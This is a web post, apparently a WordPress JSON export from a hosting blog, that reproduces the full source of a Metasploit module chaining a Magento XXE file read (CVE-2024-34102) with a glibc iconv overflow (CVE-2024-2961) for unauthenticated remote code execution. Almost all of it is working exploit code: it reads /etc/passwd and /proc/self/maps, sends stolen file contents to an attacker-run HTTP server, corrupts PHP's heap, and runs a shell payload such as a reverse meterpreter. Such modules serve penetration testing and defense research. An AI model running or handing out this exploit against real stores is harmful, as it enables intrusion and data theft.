##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking<\/p>\n
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Retry
prepend Msf::Exploit::Remote::AutoCheck
require ‘elftools’<\/p>\n
class ProcSelfMapsError < StandardError; end<\/p>\n
PAD = 20
HEAP_SIZE = 2 * 1024 * 1024
BUG = ‘\u5284’<\/p>\n
def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘CosmicSting: Magento Arbitrary File Read (CVE-2024-34102) + PHP Buffer Overflow in the iconv() function of glibc (CVE-2024-2961)’,
‘Description’ => %q{
This combination of an Arbitrary File Read (CVE-2024-34102) and a Buffer Overflow in glibc (CVE-2024-2961)
allows for unauthenticated Remote Code Execution on the following versions of Magento and Adobe Commerce and
earlier if the PHP and glibc versions are also vulnerable:
– 2.4.7 and earlier
– 2.4.6-p5 and earlier
– 2.4.5-p7 and earlier
– 2.4.4-p8 and earlier<\/p>\n
Vulnerable PHP versions:
– From PHP 7.0.0 (2015) to 8.3.7 (2024)<\/p>\n
Vulnerable iconv() function in the GNU C Library:
– 2.39 and earlier<\/p>\n
The exploit chain is quite interesting and for more detailed information check out the references. The tl;dr being:
CVE-2024-34102 is an XML External Entity vulnerability leveraging PHP filters to read arbitrary files from the target
system. The exploit chain uses this to read \/proc\/self\/maps, providing the address of PHP’s heap and the libc’s filename.
The libc is then downloaded, and the offsets of libc_malloc, libc_system and libc_realloc are extracted, and made use
of later in the chain.<\/p>\n
With this information and expert knowledge of PHP’s heap (chunks, free lists, buckets, bucket brigades), CVE-2024-2961
can be exploited. A long chain of PHP filters is constructed and sent in the same way the XXE is exploited, building a
payload in memory and using the buffer overflow to execute it, resulting in an unauthenticated RCE.
},
‘Author’ => [
‘Sergey Temnikov’, # CVE-2024-34102 Discovery
‘Charles Fol’, # CVE-2024-2961 Discovery + RCE PoC
‘Heyder’, # module for CVE-2024-34102
‘jheysel-r7’ # module
],
‘References’ => [
[ ‘URL’, ‘https:\/\/github.com\/spacewasp\/public_docs\/blob\/main\/CVE-2024-34102.md’],
[ ‘URL’, ‘https:\/\/sansec.io\/research\/cosmicsting’],
[ ‘URL’, ‘https:\/\/www.ambionics.io\/blog\/iconv-cve-2024-2961-p1’],
[ ‘URL’, ‘https:\/\/github.com\/ambionics\/cnext-exploits\/blob\/main\/cosmicsting-cnext-exploit.py’], # PoC this module is based on
[ ‘CVE’, ‘2024-2961’],
[ ‘CVE’, ‘2024-34102’]],
‘License’ => MSF_LICENSE,
‘Platform’ => %w[linux unix],
‘Privileged’ => false,
‘Arch’ => [ ARCH_CMD ],
‘Targets’ => [
[
‘Unix Command’,
{
‘Platform’ => %w[unix linux],
‘Arch’ => ARCH_CMD,
‘Type’ => :unix_cmd
# Tested with cmd\/linux\/http\/x64\/meterpreter_reverse_tcp
}
],
],
‘DefaultTarget’ => 0,
‘DisclosureDate’ => ‘2024-07-26’, # The date the PoC for this exploit was made public
‘Notes’ => {
‘Stability’ => [ CRASH_SAFE, ],
‘SideEffects’ => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
‘Reliability’ => [ REPEATABLE_SESSION, ]}
)
)<\/p>\n
register_options(
[
OptString.new(‘TARGETURI’, [ true, ‘The base path to the web application’, ‘\/’]),
OptInt.new(‘DOWNLOAD_FILE_TIMEOUT’, [ true, ‘The amount of time to wait for the XXE to return the file requested’, 10]),
])
end<\/p>\n
def check_magento
etc_password = download_file(‘\/etc\/passwd’)
vprint_status(‘Attempting to download \/etc\/passwd’)
if etc_password.nil?
CheckCode::Safe(‘Unable to download \/etc\/passwd via the Arbitrary File Read (CVE-2024-34102).’)
else
CheckCode::Vulnerable(‘Exploit precondition 1\/3 met: Downloading \/etc\/passwd via the Arbitrary File Read (CVE-2024-34102) was successful.’)
end
end<\/p>\n
def check_php_rce_requirements
text = Rex::Text.rand_text_alpha(50)
base64 = Rex::Text.encode_base64(text)
path1 = “data:text\/plain;base64,#{base64}”<\/p>\n
result1 = download_file(path1)
if result1 == text
vprint_good(‘The data wrapper is working’)
else
return CheckCode::Safe(‘The data:\/\/ wrapper does not work’)
end<\/p>\n
text = Rex::Text.rand_text_alpha(50)
base64 = Rex::Text.encode_base64(text)
path2 = “php:\/\/filter\/\/resource=data:text\/plain;base64,#{base64}”
result2 = download_file(path2)<\/p>\n
if result2 == text
vprint_good(‘The filter wrapper is working’)
else
return CheckCode::Safe(‘The php:\/\/filter\/ wrapper does not work’)
end<\/p>\n
text = Rex::Text.rand_text_alpha(50)
compressed_text = compress(text)
base64 = Base64.encode64(compressed_text).gsub(“\\n”, ”)<\/p>\n
path = “php:\/\/filter\/zlib.inflate\/resource=data:text\/plain;base64,#{base64}”
result3 = download_file(path)
if result3 == text
vprint_good(‘The zlib extension is enabled’)
else
CheckCode::Safe(‘The zlib extension is not enabled’)
end
CheckCode::Appears(‘Exploit precondition 2\/3 met: PHP appears to be exploitable.’)
end<\/p>\n
def check_libc_version
begin
@libc_binary = get_libc
rescue ProcSelfMapsError => e
return CheckCode::Unknown(“There was an issue processing \/proc\/self\/maps which is required to extract the libc version: #{e.class}: #{e}”)
end<\/p>\n
return CheckCode::Unknown(‘Unable to download the glibc binary from the target which is required to exploit. Rerunning the module could fix this issue.’) unless @libc_binary<\/p>\n
# A string similar to the following should appear in the binary: “GNU C Library (Debian GLIBC 2.36-9+deb12u4) stable release version 2.36.”
printable_strings = @libc_binary.scan(\/[[:print:]]{20,}\/).map(&:strip)<\/p>\n
libc_version = nil<\/p>\n
printable_strings.each do |string|
if string =~ \/GNU\\s+C\\s+Library.*version\\s+(\\d\\.\\d+)\/
libc_version = Rex::Version.new(Regexp.last_match(1))
break
end
end<\/p>\n
CheckCode::Unknown(‘Unable to determine the version of libc’) unless libc_version<\/p>\n
if libc_version > Rex::Version.new(‘2.39’)
CheckCode::Safe(“glibc version is not vulnerable: #{libc_version}”)
end<\/p>\n
CheckCode::Appears(“Exploit precondition 3\/3 met: glibc is version: #{libc_version}”)
end<\/p>\n
def check
setup_module
print_status(‘module setup’)
magento_checkcode = check_magento
return magento_checkcode unless magento_checkcode.code == ‘vulnerable’<\/p>\n
print_good(magento_checkcode.reason)<\/p>\n
php_checkcode = check_php_rce_requirements
return php_checkcode unless php_checkcode.code == ‘appears’<\/p>\n
print_good(php_checkcode.reason)<\/p>\n
libc_version_checkcode = check_libc_version
return libc_version_checkcode unless libc_version_checkcode.code == ‘appears’<\/p>\n
print_good(libc_version_checkcode.reason)
CheckCode::Appears
end<\/p>\n
def download_file(file)
@filter_path = “php:\/\/filter\/convert.base64-encode\/convert.base64-encode\/resource=#{file}”
@target_file = file
@file_data = nil<\/p>\n
send_path(@filter_path)
retry_until_truthy(timeout: datastore[‘DOWNLOAD_FILE_TIMEOUT’]) do
break if @file_data
end
@file_data
end<\/p>\n
def send_path(path)
@filter_path = Rex::Text.encode_base64(path)<\/p>\n
vprint_status(‘Sending XXE request’)
vprint_status(“Filter path being sent: #{@filter_path}”)<\/p>\n
system_entity = Rex::Text.rand_text_alpha_lower(4..8)<\/p>\n
xml = “<?xml version=’1.0′ ?>”
xml += “<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}”
xml += ‘[‘
xml += ” <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >”
xml += ” <!ENTITY % #{system_entity} SYSTEM \\”http:\/\/#{datastore[‘SRVHOST’]}:#{datastore[‘SRVPORT’]}\/#{@url_file}\/#{@filter_path}\\”> %#{system_entity}; %#{@xxe_param}; “
xml += ‘]’
xml += “> <r>&#{@xxe_exfil};<\/r>”<\/p>\n
json = {
address: {
totalsReader: {
collectorList: {
totalCollector: {
sourceData: {
data: xml,
options: 524290
}
}
}
}
}
}<\/p>\n
res = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, “\/rest\/V1\/guest-carts\/#{Rex::Text.rand_text_alpha(32)}\/estimate-shipping-methods”),
‘ctype’ => ‘application\/json’,
‘data’ => JSON.generate(json)
})<\/p>\n
res
end<\/p>\n
def find_main_heap(regions)
# Any anonymous RW region with a size greater than the base heap size is a candidate.
# The heap is at the bottom of the region.
heaps = regions.reverse.each_with_object([]) do |region, arr|
next unless region[:permissions] == ‘rw-p’ &&
region[:stop] – region[:start] >= HEAP_SIZE &&
(region[:stop] & (HEAP_SIZE – 1)).zero? &&
[”, ‘[anon:zend_alloc]’].include?(region[:path])<\/p>\n
arr << (region[:stop] – HEAP_SIZE + 0x40)
end<\/p>\n
if heaps.empty?
raise ProcSelfMapsError, “Unable to find PHP’s main heap in memory by parsing \/proc\/self\/maps”
end<\/p>\n
first = heaps[0]\n
if heaps.size > 1
heap_addresses = heaps.map { |heap| “0x#{heap.to_s(16)}” }.join(‘, ‘)
vprint_status(“Potential heaps: [i]#{heap_addresses}[\/] (using first)”)
else
vprint_status(“Using [i]0x#{first.to_s(16)}[\/] as heap”)
end<\/p>\n
vprint_good(‘Successfully extracted the location in memory of the PHP heap’)
first
end<\/p>\n
def get_libc_region(regions, *names)
libc_region = regions.find do |region|
names.any? { |name| region[:path].include?(name) }
end<\/p>\n
unless libc_region
raise ProcSelfMapsError, ‘Unable to locate libc region in \/proc\/self\/maps’
end<\/p>\n
vprint_good(“Successfully located the libc region in memory: #{libc_region}”)
libc_region
end<\/p>\n
def get_libc
@regions ||= get_regions
@info[‘heaps’] = find_main_heap(@regions)
@libc_region ||= get_libc_region(@regions, ‘libc-‘, ‘libc.so’)
download_file(@libc_region[:path])
end<\/p>\n
def get_symbols_and_addresses
begin
@libc_binary ||= get_libc
rescue ProcSelfMapsError => e
fail_with(Failure::UnexpectedReply, “There was an issue processing \/proc\/self\/maps which is required to extract the libc version: #{e.class}: #{e}”)
end
fail_with(Failure::UnexpectedReply, ‘Unable to download the glibc binary, which is required to exploit. Rerunning the module could fix this issue.’) unless @libc_binary<\/p>\n
# ELFFile expects a file, instead of writing it to disk use StringIO
libc_binary_file = StringIO.new(@libc_binary)
elf = ELFTools::ELFFile.new(libc_binary_file)
symtab_section = elf.section_by_name(‘.dynsym’)
symbols = symtab_section.symbols<\/p>\n
@info[‘__libc_malloc’] = nil
@info[‘__libc_system’] = nil
@info[‘__libc_realloc’] = nil<\/p>\n
symbols.each do |symbol|
if [‘__libc_malloc’, ‘__libc_system’, ‘__libc_realloc’].include? symbol.name
@info[symbol.name] = symbol.header.st_value.to_i + @libc_region[:start]end
end<\/p>\n
fail_with(Failure::BadConfig, ‘Unable to get necessary symbols from libc.so’) unless @info[‘__libc_malloc’] && @info[‘__libc_system’] && @info[‘__libc_realloc’]vprint_status(“__libc_malloc: #{@info[‘__libc_malloc’]}”)
vprint_status(“__libc_system: #{@info[‘__libc_system’]}”)
vprint_status(“__libc_realloc: #{@info[‘__libc_realloc’]}”)
end<\/p>\n
def get_regions
# Obtains the memory regions of the PHP process by querying \/proc\/self\/maps.
maps = download_file(‘\/proc\/self\/maps’)
raise ProcSelfMapsError, ‘\/proc\/self\/maps was unable able to be downloaded’ if maps.blank?<\/p>\n
maps = maps.force_encoding(‘UTF-8’)
pattern = \/^([a-f0-9]+)-([a-f0-9]+)\\b.*\\s([-rwx]{3}[ps])\\s(.+)$\/
regions = []\n
# Example lines from: \/proc\/self\/maps
# 712eebe00000-712eec000000 rw-p 00000000 00:00 0 [anon:zend_alloc]# 712ef14aa000-712ef14ab000 rw-p 00007000 00:59 2144348 \/opt\/bitnami\/apache\/modules\/mod_mime.so
maps.each_line do |region|
if (match = pattern.match(region))
start_addr = match[1].to_i(16)
stop_addr = match[2].to_i(16)
permissions = match[3]path = match[4]\n
if path.include?(‘\/’) || path.include?(‘[‘)
path = path.split(‘ ‘, 4).last
else
path = ”
end<\/p>\n
current = {
start: start_addr,
stop: stop_addr,
permissions: permissions,
path: path
}<\/p>\n
regions << current
else
raise ProcSelfMapsError, ‘\/proc\/self\/maps is unparsable’
end
end
vprint_good(‘Successfully downloaded \/proc\/self\/maps and parsed regions’)
regions
end<\/p>\n
def compress(data)
# Compress the data and remove the 2-byte header and 4-byte checksum
compressed_data = Zlib::Deflate.deflate(data, Zlib::BEST_COMPRESSION)
compressed_data[2..-5]end<\/p>\n
def compressed_bucket(data)
# Returns a chunk of size 0x8000 that, when dechunked, returns the data.
chunked_chunk(data, 0x8000)
end<\/p>\n
def qpe(data)
# Emulates quoted-printable-encode.
data.bytes.map { |x| sprintf(‘=%02X’, x) }.join
end<\/p>\n
def ptr_bucket(*ptrs, size: nil)
# Raise an error if size is specified and doesn’t match the expected length
if size && ptrs.length * 8 != size
fail_with(Failure::BadConfig, ‘Size must match the length of pointers in ptr_bucket method’)
end<\/p>\n
bucket = ptrs.map { |ptr| p64(ptr) }.join
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)<\/p>\n
bucket
end<\/p>\n
def p64(value)
[value].pack(‘Q’) # Pack as 64-bit little-endian
end<\/p>\n
def chunked_chunk(data, size = nil)
if size.nil?
size = data.bytesize + 8
end
keep = data.bytesize + 2 # for “\\n\\n”
hex_size = data.bytesize.to_s(16)
padded_hex_size = hex_size.rjust(size – keep, ‘0’)
“#{padded_hex_size}\\n#{data}\\n”.b
end<\/p>\n
def build_exploit_path
addr_free_slot = @info[‘heaps’] + 0x20
addr_custom_heap = @info[‘heaps’] + 0x0168
addr_fake_bin = addr_free_slot – 0x10<\/p>\n
cs = 0x100<\/p>\n
# Pad needs to stay at size 0x100 at every step
pad_size = cs – 0x18
pad = “\\x00” * pad_size
3.times { pad = chunked_chunk(pad, pad.length + 6) }
pad = compressed_bucket(pad)<\/p>\n
step1_size = 1
step1 = “\\x00” * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, cs)
step1 = compressed_bucket(step1)<\/p>\n
# Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
# ISO-2022-CN-EXT. We add a `0\\n` that makes the 4th and last dechunk “crash”<\/p>\n
step2_size = 0x48
step2 = “\\x00” * (step2_size + 8)
step2 = chunked_chunk(step2, cs)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)<\/p>\n
step2_write_ptr = “0\\n”.ljust(step2_size, “\\x00”) + p64(addr_fake_bin)
step2_write_ptr = chunked_chunk(step2_write_ptr, cs)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)<\/p>\n
step3_size = cs<\/p>\n
step3_overflow = (“\\x00” * (step3_size – BUG.bytes.length) + “\\xe5\\x8a\\x84”) # BUG bytes
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)<\/p>\n
step4_size = cs
step4 = ‘=00’ + “\\x00” * (step4_size – 1)
3.times { step4 = chunked_chunk(step4) }
step4 = compressed_bucket(step4)<\/p>\n
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
addr_custom_heap, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
@info[‘heaps’], # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size: cs
)<\/p>\n
step4_custom_heap = ptr_bucket(@info[‘__libc_malloc’], @info[‘__libc_system’], @info[‘__libc_realloc’], size: 0x18)
step4_use_custom_heap_size = 0x140<\/p>\n
# Fetch payloads run the payload in the background and results in multiple sessions being returned.
# If we prevent the payload from running in the background and kill the parent process after the payload completes
# running successfully we ensure only one session gets returned and improves the stability allowing the exploit to
# be run consecutively without issue.
if payload.encoded.ends_with?(‘ &’)
command = “#{payload.encoded}& kill -9 $PPID”
else
command = “#{payload.encoded} && kill -9 $PPID”
end<\/p>\n
command = (command + “\\x00”).b
command = command.ljust(step4_use_custom_heap_size, “\\x00”.b)<\/p>\n
vprint_status(“COMMAND: #{command}”)<\/p>\n
step4_use_custom_heap = command
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)<\/p>\n
pages = ((step4 * 3) + step4_pwn + step4_custom_heap + step4_use_custom_heap + step3_overflow + (pad * PAD) + (step1 * 3) + step2_write_ptr + (step2 * 2))<\/p>\n
resource = compress(compress(pages))
resource = Base64.encode64(resource.b)
resource = “data:text\/plain;base64,#{resource.gsub(“\\n”, ”)}”<\/p>\n
filters = [
# Create buckets
‘zlib.inflate’,
‘zlib.inflate’,
# Step 0: Setup heap
‘dechunk’,
‘convert.iconv.latin1.latin1’,
# Step 1: Reverse FL order
‘dechunk’,
‘convert.iconv.latin1.latin1’,
# Step 2: Put fake pointer and make FL order back to normal
‘dechunk’,
‘convert.iconv.latin1.latin1’,
# Step 3: Trigger overflow
‘dechunk’,
‘convert.iconv.UTF-8.ISO-2022-CN-EXT’,
# Step 4: Allocate at arbitrary address and change zend_mm_heap
‘convert.quoted-printable-decode’,
‘convert.iconv.latin1.latin1’,
]\n
filters_string = filters.join(‘\/’)<\/p>\n
“php:\/\/filter\/#{filters_string}\/resource=#{resource}”
end<\/p>\n
def setup_module
@url_file = Rex::Text.rand_text_alpha_lower(4..8)
@url_data = Rex::Text.rand_text_alpha_lower(4..8)
@xxe_param = Rex::Text.rand_text_alpha_lower(4..8)
@xxe_exfil = Rex::Text.rand_text_alpha_lower(4..8)
@info = Hash.new
@module_setup_complete = true<\/p>\n
if datastore[‘SRVHOST’] == ‘0.0.0.0’ || datastore[‘SRVHOST’] == ‘::’
fail_with(Failure::BadConfig, ‘SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful’)
end<\/p>\n
start_service({
‘Uri’ => {
‘Proc’ => proc do |cli, req|
on_request_uri(cli, req)
end,
‘Path’ => ‘\/’
},
‘ssl’ => false
})
print_status(‘Server started’)
end<\/p>\n
def exploit
setup_module unless @module_setup_complete
fail_with(Failure::BadConfig, ‘Payload is too big’) if payload.encoded.length >= 0x140 # step4_use_custom_heap_size
print_status(‘Attempting to parse libc to extract necessary symbols and addresses’)
get_symbols_and_addresses
print_status(‘Attempting to build an exploit PHP filter path with the information extracted from libc and \/proc\/self\/maps’)
path = build_exploit_path
print_status(‘Sending payload…’)
send_path(path)
end<\/p>\n
def cleanup
# Clean and stop HTTP server
if service
begin
service.remove_resource(datastore[‘URIPATH’])
service.deref
service.stop
self.service = nil
rescue StandardError => e
print_error(“Failed to stop http server due to #{e}”)
end
end
super
end<\/p>\n
def on_request_uri(cli, req)
super
url_parts = req.uri.split(‘\/’)
case url_parts[1]when @url_file
path = Rex::Text.decode_base64(url_parts[2])
data = Rex::Text.rand_text_alpha_lower(4..8)
response = “
<!ENTITY % #{data} SYSTEM \\”#{path}\\”>
<!ENTITY % #{@xxe_param} \\”<!ENTITY #{@xxe_exfil} SYSTEM ‘http:\/\/#{datastore[‘SRVHOST’]}:#{datastore[‘SRVPORT’]}\/#{@url_data}\/%#{data};’>\\”>”
send_response(cli, response)
when @url_data
@file_data = Rex::Text.decode_base64(Rex::Text.decode_base64(req.uri.sub(%r{^\/#{@url_data}\/}, ”)))
send_response(cli, ”)
else
print_bad(‘Server received an unexpected request.’)
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRanking include Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::Remote::HttpServerinclude Msf::Exploit::Retryprepend Msf::Exploit::Remote::AutoCheckrequire ‘elftools’ class ProcSelfMapsError < StandardError; end PAD = 20HEAP_SIZE = 2 * 1024 * 1024BUG = ‘\u5284’ def initialize(info = {})super(update_info(info,‘Name’ => ‘CosmicSting: Magento Arbitrary File Read (CVE-2024-34102) + PHP Buffer Overflow in the iconv() …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59886","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59886","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59886"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59886\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59886"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}